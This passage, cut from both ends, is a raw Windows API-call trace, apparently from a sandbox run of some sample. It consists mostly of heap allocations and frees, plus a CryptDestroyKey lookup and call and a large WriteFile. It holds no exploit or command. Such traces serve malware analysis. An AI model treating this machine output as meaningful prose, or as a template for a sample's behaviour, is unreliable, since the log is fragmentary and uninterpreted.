hHeap=0x970000) returned 1 [0136.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0136.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0136.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0136.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0136.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0136.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ead130 | out: hHeap=0x970000) returned 1 [0136.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0136.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0136.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0136.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0136.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ef0630 | out: hHeap=0x970000) returned 1 [0136.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0136.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0136.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0136.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0136.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0136.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0136.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0136.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0136.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0136.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0136.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0136.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0136.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0136.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0136.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0136.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0136.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0136.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0136.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e96a30 | out: hHeap=0x970000) returned 1 [0136.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0136.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0136.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f8) returned 0x2e80330 [0136.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f06d30 | out: hHeap=0x970000) returned 1 [0136.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0136.570] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0136.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0136.570] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0136.570] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0136.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0136.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0136.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0136.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0136.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0136.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f8) returned 0x2f06008 [0136.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0136.573] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f06008*, nNumberOfBytesToWrite=0x166f8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f06008*, lpNumberOfBytesWritten=0x8cf5e4*=0x166f8, lpOverlapped=0x0) returned 1 [0136.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0136.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f06008 | out: hHeap=0x970000) returned 1 [0136.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0136.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0136.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0136.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0136.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0136.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0136.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0136.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0136.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0136.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0136.661] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0136.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0136.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0136.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0136.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0136.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0136.662] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0136.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0136.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0136.663] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0136.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0136.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0136.663] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0136.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0136.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0136.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0136.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0136.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0136.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0136.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0136.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0136.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0136.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0136.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0136.664] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0136.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0136.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0136.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0136.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0136.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0136.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0136.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0136.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0136.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50788, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0136.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0136.664] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0136.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0136.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0136.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0136.665] CryptDestroyKey (hKey=0xa87410) returned 1 [0136.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0136.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0136.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0136.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0136.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0136.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0136.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0136.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0136.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0136.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0136.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0136.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0136.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0136.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0136.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0136.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0136.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0136.666] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0136.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0136.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0136.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0136.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0136.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0136.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0136.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0136.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0136.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0136.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0136.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0136.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0136.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0136.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0136.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 